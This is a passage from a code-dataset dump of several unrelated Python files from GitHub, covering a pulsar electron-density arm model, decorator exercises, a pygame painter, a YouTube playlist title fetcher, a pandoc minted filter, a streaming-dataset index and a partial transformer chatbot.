np.zeros(narms).astype(int)\n arm = np.zeros((narms, narmpoints, ncoord))\n\n for j, row in enumerate(arms_tbl):\n th1[0:NNj[j], j] = (row['thmin'] +\n np.arange(NNj[j])*row['extent']/(NNj[j]-1.)) # rad\n r1[:, j] = row['rmin'] * np.exp((th1[:, j]-row['thmin'])/row['a'])\n th1[:, j] *= rad # ! deg\n # c *** begin sculpting spiral arm 2 == TC arm 3***\n if armmap[j] == 3:\n cut1 = (th1[:, j] > 370.) & (th1[:, j] <= 410.)\n r1[cut1, j] *= (1. + 0.04 * np.cos((th1[cut1, j]-390.)*180 /\n (40.*rad)))\n # c . (1. + 0.01*cos((th1(n,j)-390.)*180./(40.*rad)))\n cut2 = (th1[:, j] > 315.) & (th1[:, j] <= 370.)\n r1[cut2, j] *= (1. - 0.07 * np.cos((th1[cut2, j]-345.)*180 /\n (55.*rad)))\n # c . (1.0 - 0.08*cos((th1(n,j)-345.)*180./(55.*rad)))\n cut3 = (th1[:, j] > 180.) & (th1[:, j] <= 315.)\n r1[cut3, j] *= (1 + 0.16 * np.cos((th1[cut3, j]-260.)*180 /\n (135.*rad)))\n # (1 + 0.13* np.cos((th1[cut3,j]-260.)*180./(135.*rad)))\n # c *** begin sculpting spiral arm 4 == TC arm 2***\n if armmap[j] == 2:\n cut1 = (th1[:, j] > 290.) & (th1[:, j] <= 395.)\n r1[cut1, j] *= (1. - 0.11 * np.cos((th1[cut1, j]-350.)*180 /\n (105.*rad)))\n # c *** end arm sculpting ***\n\n \"\"\"\n open(11,file=logarms, status='unknown')\n write(11,*) 'arm n xa ya'\n \"\"\"\n # do 21 j=1,narms\n for j in range(narms):\n dth = 5.0/r1[0, j] # Python indexing\n th = th1[0, j]-0.999*dth\n # Generate spline\n cspline = CubicSpline(th1[:NNj[j], j], r1[:NNj[j], j])\n # call cspline(th1(1,j),r1(1,j),-NNj(j),th,r)\n # for k in range(narmpoints):\n # do 10 k=1,narmpoints-1\n th = th + dth * np.arange(narmpoints)\n gd_th = np.where(th <= th1[NNj[j]-1, j])[0]\n kmax[j] = np.max(gd_th) + 1 # Python indexing (we will use arange)\n r = cspline(th[gd_th])\n # x,y of each arm\n arm[j, gd_th, 0] = -r*np.sin(th[gd_th]/rad) # Python indexing\n arm[j, gd_th, 1] = r*np.cos(th[gd_th]/rad)\n\n # Wrap into a dict\n arms_dict = {}\n arms_dict['table'] = arms_tbl\n arms_dict['r1'] = r1\n arms_dict['th1'] = r1\n arms_dict['kmax'] = kmax\n arms_dict['narms'] = narms\n arms_dict['narmpoints'] = narmpoints\n arms_dict['armmap'] = armmap\n arms_dict['arm'] = arm\n return arms_dict\n","repo_name":"FRBs/ne2001","sub_path":"src/ne2001/ne_io.py","file_name":"ne_io.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"36506015534","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport itertools\nfrom functools import update_wrapper\nfrom itertools import chain\nfrom copy import deepcopy\n\n\ndef disable(func):\n '''\n Disable a decorator by re-assigning the decorator's name\n to this function. For example, to turn off memoization:\n\n >>> memo = disable\n\n '''\n return func\n\n\ndef decorator(dec_func):\n '''\n Decorate a decorator so that it inherits the docstrings\n and stuff from the function it's decorating.\n '''\n class Decorator:\n _need_to_init = {}\n # _dec_func = dec_func\n\n def __init__(self, func):\n self._func = func\n for k, v in self._need_to_init.items():\n setattr(self, k, deepcopy(v))\n update_wrapper(self, func, updated=[])\n\n def __call__(self, *args, **kwargs):\n return dec_func(self._func, args, kwargs, mem=self)\n\n def __getattribute__(self, item):\n try:\n return super().__getattribute__(item)\n except AttributeError:\n return getattr(self._func, item)\n\n @classmethod\n def init(cls, **kwargs):\n cls._need_to_init.update(kwargs)\n\n return Decorator\n\n\n@decorator\ndef countcalls(func, args, kwargs, mem):\n '''Decorator that counts calls made to the function decorated.'''\n mem.calls += 1\n return func(*args, **kwargs)\n\ncountcalls.init(calls=0)\n\n\n@decorator\ndef memo(func, args, kwargs, mem):\n '''\n Memoize a function so that it caches all return values for\n faster future lookups.\n '''\n key = tuple(chain(args, kwargs.items()))\n if key in mem.cache:\n return mem.cache[key]\n result = func(*args, **kwargs)\n mem.cache[key] = result\n return result\n\nmemo.init(cache={})\n\n\n@decorator\ndef n_ary(func, args, kwargs, mem):\n '''\n Given binary function f(x, y), return an n_ary function such\n that f(x, y, z) = f(x, f(y,z)), etc. Also allow f(x) = x.\n '''\n if not args:\n raise TypeError('takes positional arguments')\n acc_arg = args[-1]\n for next_arg in args[-2::-1]:\n acc_arg = func(next_arg, acc_arg)\n return acc_arg\n\n\ndef trace(sep):\n '''Trace calls made to function decorated.\n\n @trace(\"____\")\n def fib(n):\n ....\n\n >>> fib(3)\n --> fib(3)\n ____ --> fib(2)\n ________ --> fib(1)\n ________ <-- fib(1) == 1\n ________ --> fib(0)\n ________ <-- fib(0) == 1\n ____ <-- fib(2) == 2\n ____ --> fib(1)\n ____ <-- fib(1) == 1\n <-- fib(3) == 3\n\n '''\n @decorator\n def dec(func, args, kwargs, mem):\n func_args = \", \".join(itertools.chain(\n (str(a) for a in args),\n (f'{k}={v}' for k, v in kwargs.items())\n ))\n func_call = f'{func.__name__}({func_args})'\n print(f'{sep * mem.nested} --> {func_call}')\n\n mem.nested += 1\n result = func(*args, **kwargs)\n mem.nested -= 1\n\n print(f'{sep * mem.nested} <-- {func_call} == {result}')\n return result\n dec.init(nested=0)\n return dec\n\n\n\n@memo\n@countcalls\n@n_ary\ndef foo(a, b):\n return a + b\n\n\n@countcalls\n@memo\n@n_ary\ndef bar(a, b):\n return a * b\n\n\n@countcalls\n@trace(\" \")\n@memo\ndef fib(n):\n \"\"\"Some doc\"\"\"\n return 1 if n <= 1 else fib(n-1) + fib(n-2)\n\n\ndef main():\n print(foo(4, 3))\n print(foo(4, 3, 2))\n print(foo(4, 3))\n print(\"foo was called\", foo.calls, \"times\")\n\n print(bar(4, 3))\n print(bar(4, 3, 2))\n print(bar(4, 3, 2, 1))\n print(\"bar was called\", bar.calls, \"times\")\n\n print(fib.__doc__)\n fib(10)\n print(fib.calls, 'calls made')\n # 19 - т.к. счётчик стоит до мемоизации, так что вытягивание значения из кеша тоже считается.\n # Я бы переставил memo и countcalls местами, тогда будет 11 (что соответствует идеологически и трейсу)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"borograam/otus","sub_path":"01_advanced_basics/deco/deco.py","file_name":"deco.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73976355048","text":"import lxml.etree as ET\nimport math\n\nfrom .Point import Point\nfrom . import styles\n\nclass Line:\n def __init__(self, a, b, style_update={}):\n \"\"\"\n point, point, dict -> None\n :param a: a point on the line\n :param b: a point on the line\n :param [style_update]: the updated style of the line\n \"\"\"\n self.a = a\n self.b = b\n\n self.dx = self.b.x - self.a.x\n self.dy = self.b.y - self.a.y\n\n # length of the line\n self.length = math.sqrt(self.dx**2 + self.dy**2)\n # rounded length of the line\n self.rlength = round(self.length)\n\n # style sheet for the line\n self.__style = {**styles.line, **style_update}\n self.__style['x1'] = str(a.x)\n self.__style['y1'] = str(a.y)\n self.__style['x2'] = str(b.x)\n self.__style['y2'] = str(b.y)\n\n self.node = ET.Element('line', self.__style)\n","repo_name":"JDong3/euclidean","sub_path":"objects/geometry/Line.py","file_name":"Line.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19111243507","text":"import pygame\nimport random\n\n\n\npygame.init()\nwin = pygame.display.set_mode((800,560))\npygame.display.set_caption('Paint screen with random colors')\n\n\nw=20\nh=20\nrun = True\nwhile run:\n\n \n \n for event in pygame.event.get():\n #print (event)\n if event.type == pygame.QUIT:\n run = False\n\n for y in range(0,560,w):\n for x in range(0,800,h):\n pygame.time.delay(8)\n pygame.draw.rect(win, (random.randrange(226),random.randrange(226),random.randrange(226)), (x,y,w,h))\n pygame.display.update()\n\n win.fill((0,0,0))\n\npygame.quit()\n","repo_name":"dev-arctik/Paint-Canvas","sub_path":"8a.Paint screen with random color.py","file_name":"8a.Paint screen with random color.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70018823528","text":"from time import time\nfrom pytube import YouTube, Playlist\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\ndef get_playlist():\n \"\"\"\n Asks user for playlist title\n \"\"\"\n\n \n\n# playlist_link = \"https://www.youtube.com/playlist?list=PLJKfZ_cKGyLdYqdzGLCJPbsi9UGCcEc5e\"\nplaylist_link = \"https://www.youtube.com/playlist?list=PLHtZ4BshlOJW8f5QAr9d3tOMcggdAmKgW\"\nvideo_links = Playlist(playlist_link).video_urls\nstart = time()\n\n\ndef get_video_title(link):\n title = YouTube(link).title\n return title\n\n\nprocesses = []\nwith ThreadPoolExecutor(max_workers=10) as executor:\n for url in video_links:\n processes.append(executor.submit(get_video_title, url))\n\nvideo_titles = []\nfor task in as_completed(processes):\n video_titles.append(task.result())\n print(task.result())\n\n\nprint(f'Time taken: {time() - start}')\n","repo_name":"wolftales/playlist","sub_path":"playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3736787920","text":"#!/usr/bin/env python3\n''' A pandoc filter that has the LaTeX writer use minted for typesetting code.\n\nUsage:\n pandoc --filter ./minted.py -o myfile.tex myfile.md\n'''\n\nfrom string import Template\nfrom pandocfilters import toJSONFilter, RawBlock, RawInline\n\n\ndef unpack_code(value, language):\n ''' Unpack the body and language of a pandoc code element.\n\n Args:\n value contents of pandoc object\n language default language\n '''\n [[_, classes, attributes], contents] = value\n\n if len(classes) > 0:\n language = classes[0]\n\n attributes = ', '.join('='.join(x) for x in attributes)\n\n return {'contents': contents, 'language': language,\n 'attributes': attributes}\n\n\ndef unpack_metadata(meta):\n ''' Unpack the metadata to get pandoc-minted settings.\n\n Args:\n meta document metadata\n '''\n settings = meta.get('pandoc-minted', {})\n if settings.get('t', '') == 'MetaMap':\n settings = settings['c']\n\n # Get language.\n language = settings.get('language', {})\n if language.get('t', '') == 'MetaInlines':\n language = language['c'][0]['c']\n else:\n language = None\n\n return {'language': language}\n\n else:\n # Return default settings.\n return {'language': 'text'}\n \n\ndef minted(key, value, format, meta):\n ''' Use minted for code in LaTeX.\n\n Args:\n key type of pandoc object\n value contents of pandoc object\n format target output format\n meta document metadata\n '''\n if format != 'latex':\n return\n\n # Determine what kind of code object this is.\n if key == 'CodeBlock':\n template = Template(\n '\\\\begin{minted}[$attributes]{$language}\\n$contents\\n\\end{minted}'\n )\n Element = RawBlock\n else:\n return\n\n settings = unpack_metadata(meta)\n\n code = unpack_code(value, settings['language'])\n\n return [Element(format, template.substitute(code))]\n\n\nif __name__ == '__main__':\n toJSONFilter(minted)\n\n","repo_name":"spearbit-audits/report-template","sub_path":"pandoc-minted.py","file_name":"pandoc-minted.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"53"} +{"seq_id":"72638587368","text":"import math\nfrom io import BufferedIOBase, BufferedReader, BufferedWriter, BytesIO\nfrom typing import Dict, List, Optional, Tuple, Union\n\nimport numpy as np\nfrom numpy.typing import NDArray\n\nfrom composer.datasets.streaming.world import World\n\n__all__ = [\n \"get_index_basename\",\n \"get_shard_basename\",\n \"sample_dict_to_bytes\",\n \"bytes_to_sample_dict\",\n \"StreamingDatasetIndex\",\n]\n\n\ndef get_index_basename() -> str:\n \"\"\"Get the basename for a streaming dataset index.\n\n Returns:\n str: Basename of file.\n \"\"\"\n return 'index.mds'\n\n\ndef get_shard_basename(shard: int) -> str:\n \"\"\"Get the basename for a streaming dataset shard.\n\n Args:\n shard (int): Shard index.\n\n Returns:\n str: Basename of file.\n \"\"\"\n return f'{shard:06}.mds'\n\n\ndef sample_dict_to_bytes(obj: Dict[str, bytes], keys: List[str]) -> bytes:\n \"\"\"Dump a sample dict to bytes, given field names.\n\n Args:\n obj (Dict[str, bytes]): The sample dict to encode.\n keys (list of str): The field names.\n\n Returns:\n bytes: The encoded sample bytes.\n \"\"\"\n values = []\n for key in keys:\n value = obj[key]\n values.append(value)\n sizes = list(map(len, values))\n sizes = np.array(sizes, np.int64)\n return sizes.tobytes() + b''.join(values)\n\n\ndef bytes_to_sample_dict(data: bytes, keys: List[str]) -> Dict[str, bytes]:\n \"\"\"Load a sample dict from bytes and field names.\n\n Args:\n data (bytes): The encoded sample data.\n keys (List[str]): The field names. Must be in the same order as the ``keys`` used when calling :func:`.sample_dict_to_bytes`.\n\n Returns:\n Dict[str, bytes]: The decoded sample dict.\n \"\"\"\n num_values = len(keys)\n sizes = np.frombuffer(data[:num_values * np.int64().nbytes], np.int64)\n ends = num_values * np.int64().nbytes + sizes.cumsum()\n begins = ends - sizes\n values = []\n for begin, end in zip(begins, ends):\n value = data[begin:end]\n values.append(value)\n return dict(zip(keys, values))\n\n\ndef read_array(fp: BufferedIOBase, count: int, dtype: type) -> np.ndarray:\n \"\"\"Load the count items from the file handle, advancing its position.\n\n Args:\n fp (BufferedIOBase): File handle.\n count (int): Number of items to read.\n dtype (type): Item datatype.\n\n Returns:\n np.ndarray: The read array.\n \"\"\"\n num_bytes = count * dtype().nbytes\n data = fp.read(num_bytes)\n return np.frombuffer(data, dtype)\n\n\nclass StreamingDatasetIndex(object):\n \"\"\"Streaming Dataset index file, containing all the info about shards and samples.\n\n The shards are binary buffers with samples concatenated together. All the\n offset info across the whole dataset is contained in the index file. Workers\n read this file to calculate how much of which shards their slice is.\n\n Each sample is a dict of str to bytes. All samples must contain the same\n dict keys (fields). These strings are stored in the index file for\n efficiency.\n\n Args:\n samples_per_shard (NDArray[np.int64]): Number of samples of each shard.\n bytes_per_shard (NDArray[np.int64]): Size in bytes of each shard.\n bytes_per_sample (NDArray[np.int64]): Size in bytes of each sample across all shards.\n fields (List[str]): The names of the samples' fields in order.\n \"\"\"\n\n def __init__(self, samples_per_shard: NDArray[np.int64], bytes_per_shard: NDArray[np.int64],\n bytes_per_sample: NDArray[np.int64], fields: List[str]) -> None:\n self.samples_per_shard = samples_per_shard\n self.bytes_per_shard = bytes_per_shard\n self.bytes_per_sample = bytes_per_sample\n self.fields = fields\n\n # Totals.\n self.num_shards = len(samples_per_shard)\n self.total_bytes = sum(bytes_per_shard)\n self.total_samples = len(bytes_per_sample)\n self.num_fields = len(fields)\n\n # Shard -> sample range.\n self.shard_ends = self.samples_per_shard.cumsum()\n self.shard_begins = self.shard_ends - self.samples_per_shard\n\n # Sample -> shard, byte offset within shard.\n self.sample_shards, self.sample_shard_offsets = self._locate_samples()\n\n @classmethod\n def loads(cls, data: bytes):\n \"\"\"Load a StreamingDatasetIndex from raw bytes.\n\n Args:\n data (bytes): The serialized form.\n\n Returns:\n cls: The loaded object.\n \"\"\"\n fp = BytesIO(data)\n return cls.load(fp)\n\n @classmethod\n def load(cls, fp: Union[BufferedReader, BytesIO]):\n \"\"\"Load a StreamingDatasetIndex from a file handle.\n\n Args:\n fp (file): The file to read.\n\n Returns:\n cls: The loaded object.\n \"\"\"\n magic, version, num_shards = read_array(fp, 3, np.uint32)\n assert magic == 0xDA7AD06E\n assert version == 1\n total_samples, total_bytes = read_array(fp, 2, np.int64)\n del total_bytes\n samples_per_shard = read_array(fp, num_shards, np.int64)\n bytes_per_shard = read_array(fp, num_shards, np.int64)\n bps_format, = read_array(fp, 1, np.int32)\n if not bps_format:\n sample_bytes, = read_array(fp, 1, np.int64)\n bytes_per_sample = np.full(total_samples, sample_bytes)\n elif bps_format == 1:\n bytes_per_sample = read_array(fp, total_samples, np.int8)\n elif bps_format == 2:\n bytes_per_sample = read_array(fp, total_samples, np.int16)\n elif bps_format == 4:\n bytes_per_sample = read_array(fp, total_samples, np.int32)\n elif bps_format == 8:\n bytes_per_sample = read_array(fp, total_samples, np.int64)\n else:\n assert False\n bytes_per_sample = bytes_per_sample.astype(np.int64)\n num_fields, = read_array(fp, 1, np.int32)\n bytes_per_field = read_array(fp, num_fields, np.int32)\n fields = [fp.read(size).decode('utf-8') for size in bytes_per_field]\n return cls(samples_per_shard, bytes_per_shard, bytes_per_sample, fields)\n\n def dumps(self) -> bytes:\n \"\"\"Dump a StreamingDatasetIndex to raw bytes.\n\n Returns:\n bytes: The serialized form.\n \"\"\"\n magic = 0xDA7AD06E\n version = 1\n header = np.array([magic, version, self.num_shards], np.uint32)\n totals = np.array([self.total_samples, self.total_bytes], np.int64)\n if not len(self.bytes_per_sample):\n bps_format = 1\n bps = self.bytes_per_sample.astype(np.int8)\n elif len(set(self.bytes_per_sample)) == 1:\n bps_format = 0\n bps = np.int64(self.bytes_per_sample[0])\n else:\n max_bps = self.bytes_per_sample.max()\n if max_bps < 256:\n bps_format = 1\n bps = self.bytes_per_sample.astype(np.int8)\n elif max_bps < (1 << 16):\n bps_format = 2\n bps = self.bytes_per_sample.astype(np.int16)\n elif max_bps < (1 << 32):\n bps_format = 4\n bps = self.bytes_per_sample.astype(np.int32)\n else:\n bps_format = 8\n bps = self.bytes_per_sample\n bps_format = np.int32(bps_format)\n num_fields = np.int32(len(self.fields))\n bytes_per_field = np.array([len(field.encode('utf-8')) for field in self.fields], np.int32)\n arrays = (header, totals, self.samples_per_shard, self.bytes_per_shard, bps_format, bps, num_fields,\n bytes_per_field)\n array_bytes = b''.join([arr.tobytes() for arr in arrays])\n field_bytes = b''.join([field.encode('utf-8') for field in self.fields])\n return array_bytes + field_bytes\n\n def dump(self, fp: BufferedWriter) -> None:\n \"\"\"Dump a StreamingDatasetIndex to the file.\n\n Args:\n fp (file): The file to write.\n \"\"\"\n data = self.dumps()\n fp.write(data)\n\n def _locate_samples(self) -> Tuple[NDArray[np.int64], NDArray[np.int64]]:\n \"\"\"Precompute the shard and byte offset within the shard of every sample.\n\n Returns:\n sample_shards (NDArray[np.int64]): Shard per sample.\n sample_shard_offsets (NDArray[np.int64]): Intra-shard byte offset per sample.\n \"\"\"\n shard_ends = self.bytes_per_shard.cumsum()\n shard_begins = shard_ends - self.bytes_per_shard\n\n sample_shard_begins = []\n sample_shards = []\n for shard, (num_samples, shard_begin) in enumerate(zip(self.samples_per_shard, shard_begins)):\n sample_shard_begins += [shard_begin] * num_samples\n sample_shards += [shard] * num_samples\n sample_shard_begins = np.array(sample_shard_begins, np.int64)\n sample_shards = np.array(sample_shards, np.int64)\n\n sample_ends = self.bytes_per_sample.astype(np.int64).cumsum()\n sample_begins = sample_ends - self.bytes_per_sample\n sample_shard_offsets = sample_begins - sample_shard_begins\n return sample_shards, sample_shard_offsets\n\n def get_partition(self, world: World, batch_size: Optional[int] = None) -> Tuple[List[int], int, int]:\n \"\"\"Get the shards and sample range of a given partition of the dataset.\n\n Args:\n world (World): Context about workers, devices, and nodes.\n batch_size (Optional[int]): Hint the batch_size that will be used on each device's DataLoader.\n Worker indices will be constructed so that there is at most 1 incomplete batch at the end of each epoch.\n E.g. if the DataLoader is reading over (samples=[0, 1, 2, 3, 4, 5, 6, 7], num_workers=3, batch_size=2, drop_last=True)\n but `batch_size` is not hinted to the StreamingDataset ahead of time\n then the samples will by default be assigned like: w0: [0, 1, 2], w1: [3, 4, 5], w2: [6, 7]\n and will be read as batches: [0, 1], [3, 4], [6, 7] (with batches [2] and [5] dropped as incomplete)\n but this is suboptimal because we could have dropped no samples.\n So when `batch_size` is provided as a hint, we assign samples like this: w0: [0, 1, 2, 3], w1: [4, 5], w2: [6, 7]\n which will be read as batches: [0, 1], [4, 5], [6, 7], [2, 3]\n\n Returns:\n shards (Sequence[int]): The shards that this partition overlaps.\n min_id (int): The lowest sample ID of this partition.\n max_id (int): The highest sample ID of this partition.\n \"\"\"\n\n global_device = world.global_device\n global_num_devices = world.global_num_devices\n device_worker = world.device_worker\n device_num_workers = world.device_num_workers\n\n # Splits a range (start, start+total) into num_parts such that:\n # each part spans a continguous range [part_min_id, part_max_id]\n # each part_i starts immediately from where the previous part_[i-1] stopped\n # all parts have the same number of items,\n # except the first K parts may have exactly 1 more item\n def _get_min_max_size(start: int, total: int, part: int, num_parts: int):\n sizes = [math.ceil((total - p) / num_parts) for p in range(num_parts)]\n min_ids = np.cumsum([0] + sizes)\n part_min_id = start + min_ids[part]\n part_max_id = start + min_ids[part + 1] - 1\n part_size = sizes[part]\n return part_min_id, part_max_id, part_size\n\n device_min_id, _, device_samples = _get_min_max_size(0, self.total_samples, global_device, global_num_devices)\n\n # Some devices may have 1 fewer sample, so repeat some samples at boundaries\n expected_device_samples = math.ceil(self.total_samples / global_num_devices)\n if device_samples < expected_device_samples:\n if device_samples != expected_device_samples - 1:\n raise RuntimeError(\"Found device partition with incorrect # samples\")\n device_min_id -= 1\n device_samples += 1\n\n if not batch_size:\n worker_min_id, worker_max_id, _ = _get_min_max_size(device_min_id, device_samples, device_worker,\n device_num_workers)\n else:\n device_batches = math.ceil(device_samples / batch_size)\n samples_missing = device_batches * batch_size - device_samples\n\n # Determine which batches this worker is responsible for\n worker_min_batch_id, worker_max_batch_id, _ = _get_min_max_size(0, device_batches, device_worker,\n device_num_workers)\n\n # The last device_worker to be read from will be the one with the incomplete batch.\n # This is done to match PyTorch DataLoader's round-robin scheduling of workers\n # All device_workers must be careful to account for the missing samples offset by the incomplete batch\n incomplete_device_worker = (device_batches + device_num_workers - 1) % device_num_workers\n min_id_offset = 0 if device_worker <= incomplete_device_worker else samples_missing\n max_id_offset = 0 if device_worker < incomplete_device_worker else samples_missing\n\n worker_min_id = device_min_id + worker_min_batch_id * batch_size - min_id_offset\n worker_max_id = device_min_id + (worker_max_batch_id + 1) * batch_size - max_id_offset - 1\n\n min_shard = self.sample_shards[worker_min_id]\n max_shard = self.sample_shards[worker_max_id]\n shards = list(range(min_shard, max_shard + 1))\n return shards, worker_min_id, worker_max_id\n","repo_name":"BehradToghi/composer_benchmarker","sub_path":"composer/datasets/streaming/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":13879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30570681129","text":"import re\r\nimport tensorflow_datasets as tfds\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\n\r\n# Hyperparameters\r\nMAX_LENGTH = 55\r\nBUFFER_SIZE = 20000\r\nBATCH_SIZE = 10\r\n\r\n# Load model\r\n\r\n\r\n# Load datasets\r\nwith open(\"dataset/human_text.txt\", \"r\", encoding=\"utf_8\") as f:\r\n lines = f.read().split('\\n')\r\nwith open(\"dataset/robot_text.txt\", \"r\", encoding=\"utf_8\") as f:\r\n lines2 = f.read().split('\\n')\r\nlines = [re.sub(r\"\\[\\w+]\", \"hi\", line) for line in lines]\r\nlines = [\" \".join(re.findall(r'\\w+', line)) for line in lines]\r\n\r\nlines2 = [re.sub(r\"\\[\\w+]\", \"\", line) for line in lines2]\r\nlines2 = [\" \".join(re.findall(r\"\\w+\", line)) for line in lines2]\r\n\r\n# Build tokenizer using tfds for both questions and answers\r\ntokenizer = tfds.deprecated.text.SubwordTextEncoder.build_from_corpus(\r\n lines + lines2, target_vocab_size=2**13\r\n)\r\n\r\n# Define start and end token to indicate the start and end of a sentence\r\nSTART_TOKEN, END_TOKEN = [tokenizer.vocab_size], [tokenizer.vocab_size + 1]\r\n\r\n# Vocabulary size plus start and end token\r\nVOCAB_SIZE = tokenizer.vocab_size + 2\r\n\r\n# Tokenize, filter and pad sentences\r\ndef tokenize_and_filter(inputs, outputs):\r\n tokenized_inputs, tokenized_outputs = [], []\r\n \r\n for (sentence1, sentence2) in zip(inputs, outputs):\r\n # tokenize sentence\r\n sentence1 = START_TOKEN + tokenizer.encode(sentence1) + END_TOKEN\r\n sentence2 = START_TOKEN + tokenizer.encode(sentence2) + END_TOKEN\r\n # check tokenized sentence max length\r\n if len(sentence1) <= MAX_LENGTH and len(sentence2) <= MAX_LENGTH:\r\n tokenized_inputs.append(sentence1)\r\n tokenized_outputs.append(sentence2)\r\n \r\n # pad tokenized sentences\r\n tokenized_inputs = tf.keras.preprocessing.sequence.pad_sequences(\r\n tokenized_inputs, maxlen=MAX_LENGTH, padding='post')\r\n tokenized_outputs = tf.keras.preprocessing.sequence.pad_sequences(\r\n tokenized_outputs, maxlen=MAX_LENGTH, padding='post')\r\n \r\n return tokenized_inputs, tokenized_outputs\r\n\r\n\r\nquestions, answers = tokenize_and_filter(lines, lines2)\r\n\r\n# decoder inputs use the previous target as input\r\n# remove START_TOKEN from targets\r\ndataset = tf.data.Dataset.from_tensor_slices((\r\n {\r\n 'inputs': questions,\r\n 'dec_inputs': answers[:, :-1]\r\n },\r\n {\r\n 'outputs': answers[:, 1:]\r\n },\r\n))\r\n\r\n# The first time the dataset is iterated over, its elements will be cached either in the specified file or in memory. Subsequent iterations will use the cached data.\r\ndataset = dataset.cache()\r\ndataset = dataset.shuffle(BUFFER_SIZE)\r\n# Combines consecutive elements of this dataset into batches.\r\ndataset = dataset.batch(BATCH_SIZE)\r\ndataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\r\n\r\n# Implementation of a scaled dot-product attention layer\r\ndef scaled_dot_product_attention(query, key, value, mask):\r\n matmul_qk = tf.matmul(query, key, transpose_b=True)\r\n\r\n depth = tf.cast(tf.shape(key)[-1], tf.float32)\r\n logits = matmul_qk / tf.math.sqrt(depth)\r\n\r\n # add the mask zero out padding tokens.\r\n if mask is not None:\r\n logits += (mask * -1e9)\r\n\r\n attention_weights = tf.nn.softmax(logits, axis=-1)\r\n\r\n return tf.matmul(attention_weights, value)\r\n\r\n# Implementation of multi-head attention layer with model subclassing\r\nclass MultiHeadAttention(tf.keras.layers.Layer):\r\n\r\n def __init__(self, d_model, num_heads, name=\"multi_head_attention\"):\r\n super(MultiHeadAttention, self).__init__(name=name)\r\n self.num_heads = num_heads\r\n self.d_model = d_model\r\n\r\n assert d_model % self.num_heads == 0\r\n\r\n self.depth = d_model // self.num_heads\r\n\r\n self.query_dense = tf.keras.layers.Dense(units=d_model)\r\n self.key_dense = tf.keras.layers.Dense(units=d_model)\r\n self.value_dense = tf.keras.layers.Dense(units=d_model)\r\n\r\n self.dense = tf.keras.layers.Dense(units=d_model)\r\n\r\n def split_heads(self, inputs, batch_size):\r\n inputs = tf.reshape(\r\n inputs, shape=(batch_size, -1, self.num_heads, self.depth))\r\n return tf.transpose(inputs, perm=[0, 2, 1, 3])\r\n\r\n def call(self, inputs):\r\n query, key, value, mask = inputs['query'], inputs['key'], inputs[\r\n 'value'], inputs['mask']\r\n batch_size = tf.shape(query)[0]\r\n\r\n # linear layers\r\n query = self.query_dense(query)\r\n key = self.key_dense(key)\r\n value = self.value_dense(value)\r\n\r\n # split heads\r\n query = self.split_heads(query, batch_size)\r\n key = self.split_heads(key, batch_size)\r\n value = self.split_heads(value, batch_size)\r\n\r\n scaled_attention = scaled_dot_product_attention(query, key, value, mask)\r\n\r\n scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3])\r\n\r\n concat_attention = tf.reshape(scaled_attention,(batch_size, -1, self.d_model))\r\n\r\n outputs = self.dense(concat_attention)\r\n\r\n return outputs\r\n\r\n# Implementation of Positional Encoding with Model subclassing\r\nclass PositionalEncoding(tf.keras.layers.Layer):\r\n\r\n def __init__(self, position, d_model):\r\n super(PositionalEncoding, self).__init__()\r\n self.pos_encoding = self.positional_encoding(position, d_model)\r\n\r\n def get_angles(self, position, i, d_model):\r\n angles = 1 / tf.pow(10000, (2 * (i // 2)) / tf.cast(d_model, tf.float32))\r\n return position * angles\r\n\r\n def positional_encoding(self, position, d_model):\r\n angle_rads = self.get_angles(\r\n position=tf.range(position, dtype=tf.float32)[:, tf.newaxis],\r\n i=tf.range(d_model, dtype=tf.float32)[tf.newaxis, :],\r\n d_model=d_model)\r\n # apply sin to even index in the array\r\n sines = tf.math.sin(angle_rads[:, 0::2])\r\n # apply cos to odd index in the array\r\n cosines = tf.math.cos(angle_rads[:, 1::2])\r\n\r\n pos_encoding = tf.concat([sines, cosines], axis=-1)\r\n pos_encoding = pos_encoding[tf.newaxis, ...]\r\n return tf.cast(pos_encoding, tf.float32)\r\n\r\n def call(self, inputs):\r\n return inputs + self.pos_encoding[:, :tf.shape(inputs)[1], :]\r\n\r\n# Implementation of an encoder layer with Functional API\r\ndef encoder_layer(units, d_model, num_heads, dropout, name=\"encoder_layer\"):\r\n inputs = tf.keras.Input(shape=(None, d_model), name=\"inputs\")\r\n padding_mask = tf.keras.Input(shape=(1, 1, None), name=\"padding_mask\")\r\n\r\n attention = MultiHeadAttention(\r\n d_model, num_heads, name=\"attention\")({\r\n 'query': inputs,\r\n 'key': inputs,\r\n 'value': inputs,\r\n 'mask': padding_mask\r\n })\r\n attention = tf.keras.layers.Dropout(rate=dropout)(attention)\r\n attention = tf.keras.layers.LayerNormalization(\r\n epsilon=1e-6)(inputs + attention)\r\n\r\n outputs = tf.keras.layers.Dense(units=units, activation='relu')(attention)\r\n outputs = tf.keras.layers.Dense(units=d_model)(outputs)\r\n outputs = tf.keras.layers.Dropout(rate=dropout)(outputs)\r\n outputs = tf.keras.layers.LayerNormalization(\r\n epsilon=1e-6)(attention + outputs)\r\n\r\n return tf.keras.Model(\r\n inputs=[inputs, padding_mask], outputs=outputs, name=name)\r\n\r\n# Implementation of encoder with Functional API\r\ndef encoder(vocab_size,num_layers,units,d_model,num_heads,dropout,name=\"encoder\"):\r\n inputs = 